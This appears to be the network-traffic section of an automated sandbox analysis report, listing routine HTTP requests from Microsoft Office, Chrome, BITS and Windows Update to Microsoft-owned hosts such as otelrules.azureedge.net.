              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGAb88btcw5v4GD&MD=uxdHDVbu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
